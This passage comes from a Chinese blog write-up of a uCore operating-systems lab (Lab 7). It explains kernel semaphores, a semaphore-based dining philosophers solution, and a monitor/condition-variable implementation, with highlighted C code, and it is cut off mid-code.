class="built_in">up</span>(&amp;mutex); <span class="comment">/* 离开临界区 */</span></span><br><span class="line">        <span class="built_in">down</span>(&amp;s[i]); <span class="comment">/* 如果得不到叉子就阻塞 */</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_put_forks_sema</span><span class="params">(<span class="type">int</span> i)</span> <span class="comment">/* i：哲学家号码从0到N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">        <span class="built_in">down</span>(&amp;mutex); <span class="comment">/* 进入临界区 */</span></span><br><span class="line">        state_sema[i]=THINKING; <span class="comment">/* 哲学家进餐结束 */</span></span><br><span class="line">        <span class="built_in">phi_test_sema</span>(LEFT); <span class="comment">/* 看一下左邻居现在是否能进餐 */</span></span><br><span class="line">        <span class="built_in">phi_test_sema</span>(RIGHT); <span class="comment">/* 看一下右邻居现在是否能进餐 */</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;mutex); <span class="comment">/* 离开临界区 */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>phi_test_sema</code>函数用于设置哲学家的进食状态。如果当前哲学家满足进食条件，则更新哲学家状态，执行哲学家锁所对应的V操作，以<strong>唤醒</strong>等待叉子的哲学家所对应的线程。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_test_sema</span><span class="params">(i)</span> <span class="comment">/* i：哲学家号码从0到N-1 */</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(state_sema[i]==HUNGRY&amp;&amp;state_sema[LEFT]!=EATING</span><br><span class="line">            &amp;&amp;state_sema[RIGHT]!=EATING)</span><br><span class="line">    &#123;</span><br><span class="line">        state_sema[i]=EATING;</span><br><span class="line">        <span class="built_in">up</span>(&amp;s[i]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>请给出内核级信号量的设计描述，并说明其大致执行流程</p><ul><li><p>内核中的信号量结构体如下，与操作系统理论课所实现的相差不大</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">    <span class="type">int</span> value;</span><br><span class="line">    <span class="type">wait_queue_t</span> wait_queue;</span><br><span class="line">&#125; <span class="type">semaphore_t</span>;</span><br></pre></td></tr></table></figure></li><li><p>进入临界区时，uCore会执行<code>down</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">down</span>(&amp;mutex); <span class="comment">/* 进入临界区 */</span></span><br></pre></td></tr></table></figure><p>与之相对的，退出临界区时会执行<code>up</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">up</span>(&amp;mutex); <span class="comment">/* 离开临界区 */</span></span><br></pre></td></tr></table></figure><blockquote><p><code>down</code>函数和<code>up</code>函数分别是<code>_down</code>和<code>_up</code>的wrapper。它们除了传入信号量以外，还会传入一个等待状态<code>wait_state</code>。</p></blockquote></li><li><p><code>_down</code>函数会递减当前信号量的<code>value</code>值。如果<code>value</code>在递减前为0，则将其加入至等待队列<code>wait_queue</code>中，并使当前线程<strong>立即放弃CPU资源</strong>，调度至其他线程。<strong>注意其中的原子操作</strong>。该函数的源码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> __noinline <span class="type">uint32_t</span> __down(<span class="type">semaphore_t</span> *sem, <span class="type">uint32_t</span> wait_state) &#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    <span class="keyword">if</span> (sem-&gt;value &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// value值递减</span></span><br><span class="line">        sem-&gt;value --;</span><br><span class="line">        <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 如果在上一步中，值已经为0了，则将当前进程添加进等待队列中</span></span><br><span class="line">    <span class="type">wait_t</span> __wait, *wait = &amp;__wait;</span><br><span class="line">    <span class="built_in">wait_current_set</span>(&amp;(sem-&gt;wait_queue), wait, wait_state);</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 进程调度</span></span><br><span class="line">    <span class="built_in">schedule</span>();</span><br><span class="line">    <span class="comment">// 从等待队列中删除当前进程</span></span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    <span class="built_in">wait_current_del</span>(&amp;(sem-&gt;wait_queue), wait);</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (wait-&gt;wakeup_flags != wait_state) &#123;</span><br><span class="line">        <span class="keyword">return</span> wait-&gt;wakeup_flags;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>_up</code>函数实现的功能稍微简单一点：如果没有等待线程则<code>value++</code>，否则唤醒第一条等待线程。</p><blockquote><p>注意：<code>_up</code>函数如果选择唤醒第一条等待线程的话，则<code>value</code>不加一</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> __noinline <span class="type">void</span> __up(<span class="type">semaphore_t</span> *sem, <span class="type">uint32_t</span> wait_state) &#123;</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">wait_t</span> *wait;</span><br><span class="line">        <span class="comment">// 如果当前等待队列中没有线程等待，则value照常+1</span></span><br><span class="line">        <span class="keyword">if</span> ((wait = <span class="built_in">wait_queue_first</span>(&amp;(sem-&gt;wait_queue))) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            sem-&gt;value ++;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 否则如果当前等待队列中存在线程正在等待，则唤醒该线程并开始执行对应代码</span></span><br><span class="line">        <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">assert</span>(wait-&gt;proc-&gt;wait_state == wait_state);</span><br><span class="line">            <span class="built_in">wakeup_wait</span>(&amp;(sem-&gt;wait_queue), wait, wait_state, <span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>请给出给用户态进程/线程提供信号量机制的设计方案，并比较说明给内核级提供信号量机制的异同</p><ul><li><p>内核为用户态进程/线程提供信号量机制时，需要设计多个应用程序接口，而用户态线程只能通过这些内核提供的接口来使用内核服务。借鉴于Linux提供的标准接口，内核提供的这些接口可分别为：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*Initialize semaphore object SEM to VALUE.  If PSHARED then share it</span></span><br><span class="line"><span class="comment">   with other processes.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_init</span> <span class="params">(<span class="type">sem_t</span> *__sem, <span class="type">int</span> __pshared, <span class="type">unsigned</span> <span class="type">int</span> __value)</span></span>;</span><br><span class="line"><span class="comment">/* Free resources associated with semaphore object SEM.  */</span></span><br><span class="line"><span class="comment">// 将信号量所使用的资源全部释放</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_destroy</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Open a named semaphore NAME with open flags OFLAG.  */</span></span><br><span class="line"><span class="comment">// 开启一个新信号量，并使用给定的flag来指定其标志</span></span><br><span class="line"><span class="function"><span class="type">sem_t</span> *<span class="title">sem_open</span> <span class="params">(<span class="type">const</span> <span class="type">char</span> *__name, <span class="type">int</span> __oflag, ...)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Close descriptor for named semaphore SEM.  */</span></span><br><span class="line"><span class="comment">// 将当前信号量所使用的描述符关闭</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_close</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Remove named semaphore NAME.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_unlink</span> <span class="params">(<span class="type">const</span> <span class="type">char</span> *__name)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Wait for SEM being posted.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   This function is a cancellation point and therefore not marked with</span></span><br><span class="line"><span class="comment">   __THROW.  */</span></span><br><span class="line"><span class="comment">// 一个P操作，如果sem value &gt; 0，则sem value--；否则阻塞直到sem value &gt; 0</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_wait</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Test whether SEM is posted.  */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_trywait</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Post SEM.  */</span></span><br><span class="line"><span class="comment">// 一个V操作，把指定的信号量 sem 的值加 1，唤醒正在等待该信号量的任意线程。</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_post</span> <span class="params">(<span class="type">sem_t</span> *__sem)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Get current value of SEM and store it in *SVAL.  */</span></span><br><span class="line"><span class="comment">// 获取当前信号量的值</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sem_getvalue</span> <span class="params">(<span class="type">sem_t</span> *__restrict __sem, <span class="type">int</span> *__restrict __sval)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>相同点</p><ul><li>其核心的实现逻辑是一样的</li></ul></li><li><p>不同点</p><ul><li>内核态的信号量机制可以直接调用内核的服务，而用户态的则需要通过内核提供的接口来访问内核态服务，这其中涉及到了用户态转内核态的相关机制。</li><li>内核态的信号量存储于内核栈中；但用户态的信号量存储于用户栈中。</li></ul></li></ul></li></ul><h3 id="练习2">练习2</h3><blockquote><p>总体任务：完成内核级条件变量和基于内核级条件变量的哲学家就餐问题</p></blockquote><blockquote><ol><li>基于信号量实现完成条件变量实现，给出内核级条件变量的设计描述，并说明其大致执行流程。</li></ol></blockquote><ul><li><p>管程由一个锁和多个条件变量组成，以下是管程和条件变量的结构体代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">monitor</span> <span class="type">monitor_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">condvar</span>&#123;</span><br><span class="line">    <span class="type">semaphore_t</span> sem;        <span class="comment">// 条件变量所对应的信号量</span></span><br><span class="line">    <span class="type">int</span> count;              <span class="comment">// 等待当前条件变量的等待进程总数</span></span><br><span class="line">    <span class="type">monitor_t</span> * owner;      <span class="comment">// 当前条件变量的父管程</span></span><br><span class="line">&#125; <span class="type">condvar_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> <span class="title class_">monitor</span>&#123;</span><br><span class="line">    <span class="type">semaphore_t</span> mutex;      <span class="comment">// 管程锁，每次只能有一个进程执行管程代码。该值初始化为1</span></span><br><span class="line">    <span class="type">semaphore_t</span> next;       <span class="comment">// the next semaphore is used to down the signaling proc itself, and the other OR wakeuped waiting proc should wake up the sleeped signaling proc.</span></span><br><span class="line">    <span class="type">int</span> next_count;         <span class="comment">// the number of of sleeped signaling proc</span></span><br><span class="line">    <span class="type">condvar_t</span> *cv;          <span class="comment">// 当前管程中存放所有条件变量的数组</span></span><br><span class="line">&#125; <span class="type">monitor_t</span>;</span><br></pre></td></tr></table></figure><blockquote><p>注意：<code>monitor</code>结构中<code>next</code>信号量的功能请在下文结合<code>cond_signal</code>说明来理解。</p></blockquote></li><li><p>初始化管程时，函数<code>monitor_init</code>会初始化传入管程的相关成员变量，并为该管程设置多个条件变量并初始化。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Initialize monitor.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">monitor_init</span> <span class="params">(<span class="type">monitor_t</span> * mtp, <span class="type">size_t</span> num_cv)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="built_in">assert</span>(num_cv&gt;<span class="number">0</span>);</span><br><span class="line">    mtp-&gt;next_count = <span class="number">0</span>;</span><br><span class="line">    mtp-&gt;cv = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="comment">// 初始化管程锁为1</span></span><br><span class="line">    <span class="built_in">sem_init</span>(&amp;(mtp-&gt;mutex), <span class="number">1</span>); <span class="comment">//unlocked</span></span><br><span class="line">    <span class="built_in">sem_init</span>(&amp;(mtp-&gt;next), <span class="number">0</span>);<span class="comment">// 注意这里的0</span></span><br><span class="line">    <span class="comment">// 分配当前管程内的条件变量</span></span><br><span class="line">    mtp-&gt;cv =(<span class="type">condvar_t</span> *) <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="type">condvar_t</span>)*num_cv);</span><br><span class="line">    <span class="built_in">assert</span>(mtp-&gt;cv!=<span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// 初始化管程内条件变量的各个属性</span></span><br><span class="line">    <span class="keyword">for</span>(i=<span class="number">0</span>; i&lt;num_cv; i++)&#123;</span><br><span class="line">        mtp-&gt;cv[i].count=<span class="number">0</span>;</span><br><span class="line">        <span class="built_in">sem_init</span>(&amp;(mtp-&gt;cv[i].sem),<span class="number">0</span>);</span><br><span class="line">        mtp-&gt;cv[i].owner=mtp;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>当某个线程准备离开临界区、准备释放对应的条件变量时，线程会执行函数<code>cond_signal</code>。该函数同样是这次要实现的函数之一。</p><ul><li><p>如果<strong>不存在线程</strong>正在等待带释放的条件变量，则不执行任何操作</p></li><li><p>否则，对传入条件变量内置的信号执行V操作。注意：这一步可能会唤醒某个等待线程。</p></li><li><p><strong>关键的一步！</strong> 函数内部接下来会执行<code>down(&amp;(cvp-&gt;owner-&gt;next))</code>操作。由于<code>monitor::next</code>在初始化时就设置为<strong>0</strong>，所以当执行到该条代码时，无论如何，<strong>当前正在执行<code>cond_signal</code>函数的线程一定会被挂起</strong>。这也正是管程中<code>next</code>信号量的用途。</p><blockquote><p>为什么要做这一步呢？原因是<strong>保证管程代码的互斥访问</strong>。</p><p>一个简单的例子：线程1因等待条件变量a而挂起，过了一段时间，线程2释放条件变量a，此时线程1被唤醒，并等待调度。注意！<strong>此时在管程代码中，存在两个活跃线程</strong>（这里的活跃指的是正在运行/就绪线程），而这<strong>违背了管程的互斥性</strong>。因此，线程2在释放条件变量a后应当<strong>立即挂起</strong>以保证管程代码互斥。而<code>next</code>信号量便是帮助线程2立即挂起的一个信号。</p></blockquote></li></ul><p>以下是该函数的实现代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Unlock one of threads waiting on the condition variable.</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">cond_signal</span> <span class="params">(<span class="type">condvar_t</span> *cvp)</span> </span>&#123;</span><br><span class="line">   <span class="comment">//LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">   <span class="built_in">cprintf</span>(<span class="string">&quot;cond_signal begin: cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);  </span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">   *      cond_signal(cv) &#123;</span></span><br><span class="line"><span class="comment">   *          if(cv.count&gt;0) &#123;</span></span><br><span class="line"><span class="comment">   *             mt.next_count ++;</span></span><br><span class="line"><span class="comment">   *             signal(cv.sem);</span></span><br><span class="line"><span class="comment">   *             wait(mt.next);</span></span><br><span class="line"><span class="comment">   *             mt.next_count--;</span></span><br><span class="line"><span class="comment"> *          &#125;</span></span><br><span class="line"><span class="comment">   *       &#125;</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line">    <span class="keyword">if</span>(cvp-&gt;count&gt;<span class="number">0</span>) &#123;</span><br><span class="line">        cvp-&gt;owner-&gt;next_count ++;</span><br><span class="line">        <span class="built_in">up</span>(&amp;(cvp-&gt;sem));</span><br><span class="line">        <span class="built_in">down</span>(&amp;(cvp-&gt;owner-&gt;next));</span><br><span class="line">        cvp-&gt;owner-&gt;next_count --;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="built_in">cprintf</span>(<span class="string">&quot;cond_signal end: cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>当某个线程需要等待锁时，则会执行<code>cond_wait</code>函数。而该函数是我们这次要实现的函数之一。</p><ul><li><p>当某个线程因为等待条件变量而<strong>准备</strong>将<strong>自身挂起</strong>前，此时条件变量中的<code>count</code>变量应自增1。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cvp-&gt;count++;</span><br></pre></td></tr></table></figure></li><li><p>之后当前进程应该释放<strong>所等待的条件变量所属的管程互斥锁</strong>，以便于让其他线程执行管程代码。</p><p>但如果存在一个已经在管程中、但因为执行<code>cond_signal</code>而挂起的线程，则优先继续执行该线程。</p><blockquote><p>有关“因为执行<code>cond_signal</code>而挂起的线程”的详细信息，请阅读上方<code>cond_signal</code>函数的介绍来了解。</p></blockquote><p>如果程序选择执行<code>up(&amp;(cvp-&gt;owner-&gt;next))</code>，请注意：<strong>此时mutex没有被释放</strong>。因为当前线程将被挂起，原先存在于管程中的线程被唤醒，此时管程中仍然只有一个活跃线程，不需要让新的线程进入管程。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(cvp-&gt;owner-&gt;next_count &gt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;next));</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;mutex));</span><br></pre></td></tr></table></figure></li><li><p>释放管程后，尝试获取该条件变量。如果获取失败，则当前线程将在<code>down</code>函数的内部被挂起。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">down</span>(&amp;(cvp-&gt;sem));</span><br></pre></td></tr></table></figure></li><li><p>若当前线程成功获取条件变量，则当前等待条件变量的线程数减一。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cvp-&gt;count--;</span><br></pre></td></tr></table></figure></li></ul><blockquote><p>这样就结束了吗？想想看为什么当线程成功获取条件变量时，<strong>不重新申请管程的互斥锁</strong>。</p><p>以下是一个简单的流程：线程1执行wait被挂起，释放管程的mutex，之后线程2获取mutex并进入管程，然后执行了signal唤醒线程1，同时挂起自身。在这个过程中，管程中自始自终都只存在一个活跃线程（原先的线程1执行，线程2未进入，到线程1挂起，线程2进入，再到线程1被唤醒，线程2挂起）。而此时mutex在线程1被唤醒前就已被线程2所获取，<strong>新线程无法进入管程</strong>，因此被唤醒的线程1不需要再次获取mutex。由于管程锁已被获取（<strong>不管是哪个线程获取</strong>）、管程中只有一个活跃线程，因此我们可以<strong>近似将管程锁视为是当前线程获取的</strong>。</p></blockquote><p>以下是最终代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Suspend calling thread on a condition variable waiting for condition Atomically unlocks</span></span><br><span class="line"><span class="comment">// mutex and suspends calling thread on conditional variable after waking up locks mutex. Notice: mp is mutex semaphore for monitor&#x27;s procedures</span></span><br><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">cond_wait</span> <span class="params">(<span class="type">condvar_t</span> *cvp)</span> </span>&#123;</span><br><span class="line">    <span class="comment">//LAB7 EXERCISE1: YOUR CODE</span></span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;cond_wait begin:  cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);</span><br><span class="line">   <span class="comment">/*</span></span><br><span class="line"><span class="comment">    *         cv.count ++;</span></span><br><span class="line"><span class="comment">    *         if(mt.next_count&gt;0)</span></span><br><span class="line"><span class="comment">    *            signal(mt.next)</span></span><br><span class="line"><span class="comment">    *         else</span></span><br><span class="line"><span class="comment">    *            signal(mt.mutex);</span></span><br><span class="line"><span class="comment">    *         wait(cv.sem);</span></span><br><span class="line"><span class="comment">    *         cv.count --;</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    cvp-&gt;count++;</span><br><span class="line">    <span class="keyword">if</span>(cvp-&gt;owner-&gt;next_count &gt; <span class="number">0</span>)</span><br><span class="line">        <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;next));</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="built_in">up</span>(&amp;(cvp-&gt;owner-&gt;mutex));</span><br><span class="line">    <span class="built_in">down</span>(&amp;(cvp-&gt;sem));</span><br><span class="line">    cvp-&gt;count--;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">cprintf</span>(<span class="string">&quot;cond_wait end:  cvp %x, cvp-&gt;count %d, cvp-&gt;owner-&gt;next_count %d\n&quot;</span>, cvp, cvp-&gt;count, cvp-&gt;owner-&gt;next_count);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>管程中函数的入口出口设计</p><ul><li><p>为了让整个管程正常运行，还需在管程中的每个函数的入口和出口增加相关操作，即：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">monitorFunc</span><span class="params">()</span> </span>&#123;</span><br><span class="line">     <span class="built_in">down</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line"><span class="comment">//--------into routine in monitor--------------</span></span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line"><span class="comment">//--------leave routine in monitor--------------</span></span><br><span class="line">      <span class="keyword">if</span>(mtp-&gt;next_count&gt;<span class="number">0</span>)</span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;next));</span><br><span class="line">      <span class="keyword">else</span></span><br><span class="line">         <span class="built_in">up</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>这样做的好处有两个</p><ul><li>只有一个进程在执行管程中的函数。</li><li>避免由于执行了<code>cond_signal</code>函数而睡眠的进程无法被唤醒。</li></ul></li><li><p>针对 <strong>“避免由于执行了<code>cond_signal</code>函数而睡眠的进程无法被唤醒“</strong> 这个优点简单说一下</p><ul><li>管程中<code>wait</code>和<code>signal</code>函数的调用存在时间顺序。例如：当线程1先调用<code>signal</code>唤醒线程2并将自身线程挂起后，线程2在开始执行时将无法唤醒原先的在<code>signal</code>中挂起的线程1。</li><li>也就是说，<strong>只要存在线程在管程中执行了<code>signal</code>，那么至少存在一个线程在管程中被挂起</strong>。</li><li>此时，就只能在临界区外唤醒挂起的线程1，而这一步在代码中也得到了实现。</li></ul></li></ul></li></ul><blockquote><ol start="2"><li>用管程机制实现哲学家就餐问题的解决方案（基于条件变量）</li></ol></blockquote><ul><li><p>这题涉及到了两个函数，分别是<code>phi_take_forks_condvar</code>和<code>phi_put_forks_condvar</code>。与信号量所实现的哲学家就餐问题类似，大体逻辑是一致的。</p></li><li><p>首先，哲学家需要尝试获取刀叉，如果刀叉没有获取到，则等待刀叉。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">phi_take_forks_condvar</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">     <span class="built_in">down</span>(&amp;(mtp-&gt;mutex));</span><br><span class="line"><span class="comment">//--------into routine in monitor--------------</span></span><br><span class="line">     <span class="comment">// LAB7 EXERCISE1: YOUR 